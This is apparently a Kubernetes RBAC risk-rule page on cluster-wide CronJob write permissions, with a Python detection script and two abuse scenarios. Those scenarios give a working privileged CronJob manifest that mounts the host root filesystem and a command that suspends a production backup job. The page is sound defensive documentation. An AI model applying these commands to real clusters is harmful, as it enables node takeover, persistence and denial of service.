Overview

| Field | Value |
|---|---|
| ID | 1039 |
| Name | Manage CronJobs cluster-wide (scheduled privileged execution, persistence) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | batch |
| Resources | cronjobs |
| Verbs | create, update, patch, delete |
| Tags | Persistence, PrivilegeEscalation, Tampering, WorkloadLifecycle |

Description

Permits creating, updating, patching, or deleting CronJobs across all namespaces. CronJobs schedule recurring batch Jobs. This is critical because it lets the holder schedule pods (potentially privileged) to run at regular intervals, which can lead to privilege escalation, persistent access, and tampering.
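
An added example (not part of the original rule page or any project's code): a Python check that reports which subjects hold this rule's verbs on `batch`/`cronjobs` in every namespace, including grants made through `*` wildcards. The role, binding and subject names in the sample data are constructed; real input is assumed to be the JSON from `kubectl get clusterroles -o json` and `kubectl get clusterrolebindings -o json`.

```python
RISKY_VERBS = {"create", "update", "patch", "delete"}

def matches(values, wanted):
    return "*" in values or wanted in values  # RBAC lists accept the '*' wildcard

def risky_verbs(rule):
    """Verbs in one PolicyRule that grant write access to batch/cronjobs."""
    if not (matches(rule.get("apiGroups", []), "batch")
            and matches(rule.get("resources", []), "cronjobs")):
        return set()
    verbs = set(rule.get("verbs", []))
    return set(RISKY_VERBS) if "*" in verbs else verbs & RISKY_VERBS

def cluster_wide_cronjob_writers(roles, bindings):
    """Map each subject to the risky verbs it holds in every namespace."""
    # Pass ClusterRoleBindings only: a RoleBinding to the same ClusterRole is namespace-limited.
    by_role = {r["metadata"]["name"]: set().union(*map(risky_verbs, r.get("rules") or []))
               for r in roles.get("items", [])}
    findings = {}
    for binding in bindings.get("items", []):
        verbs = by_role.get(binding["roleRef"]["name"])
        if not verbs:  # role not in the dump, or it grants no risky verb
            continue
        for s in binding.get("subjects") or []:
            name = f"{s['namespace']}:{s['name']}" if s.get("namespace") else s["name"]
            findings.setdefault(f"{s['kind']}/{name}", set()).update(verbs)
    return findings

# Constructed sample input (hypothetical names), shaped like `kubectl get ... -o json`.
def role(name, group, resource, verbs):
    return {"metadata": {"name": name},
            "rules": [{"apiGroups": [group], "resources": [resource], "verbs": verbs}]}
def bind(role_name, **subject):
    return {"roleRef": {"kind": "ClusterRole", "name": role_name}, "subjects": [subject]}

SAMPLE_ROLES = {"items": [
    role("batch-admin", "batch", "cronjobs", ["*"]),
    role("patch-anything", "*", "*", ["get", "patch"]),
    role("cron-viewer", "batch", "cronjobs", ["get", "list"]),
    role("apps-writer", "apps", "deployments", ["create"]),
]}
SAMPLE_BINDINGS = {"items": [
    bind("batch-admin", kind="ServiceAccount", namespace="ci", name="deployer"),
    bind("patch-anything", kind="User", name="alice"),
    bind("cron-viewer", kind="Group", name="devs"),
]}

if __name__ == "__main__":
    print(cluster_wide_cronjob_writers(SAMPLE_ROLES, SAMPLE_BINDINGS))
```

Rules scoped with `resourceNames` are still reported, since this check does not evaluate that field.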

Abuse Scenarios

  1. Create a new CronJob that schedules a privileged pod to run periodically.

```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: batch/v1
kind: CronJob
metadata:
  name: privileged-cronjob
spec:
  schedule: "*/1 * * * *" # Every minute
  jobTemplate:
    spec:
      template:
        spec:
          hostNetwork: true
          hostPID: true
          containers:
          - name: attacker
            image: busybox
            command: ["/bin/sh", "-c", "echo 'Pwned!' > /host/pwned.txt"]
            securityContext:
              privileged: true
            volumeMounts:
            - mountPath: /host
              name: host-root
          volumes:
          - name: host-root
            hostPath:
              path: /
          restartPolicy: OnFailure
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
```

  2. Suspend a critical CronJob, preventing scheduled tasks from running (DoS).

```bash
kubectl patch cronjob <cronjob-name> -n <namespace> -p '{"spec" : {"suspend" : true}}'
# Example: kubectl patch cronjob backup-db -n production -p '{"spec" : {"suspend" : true}}'
```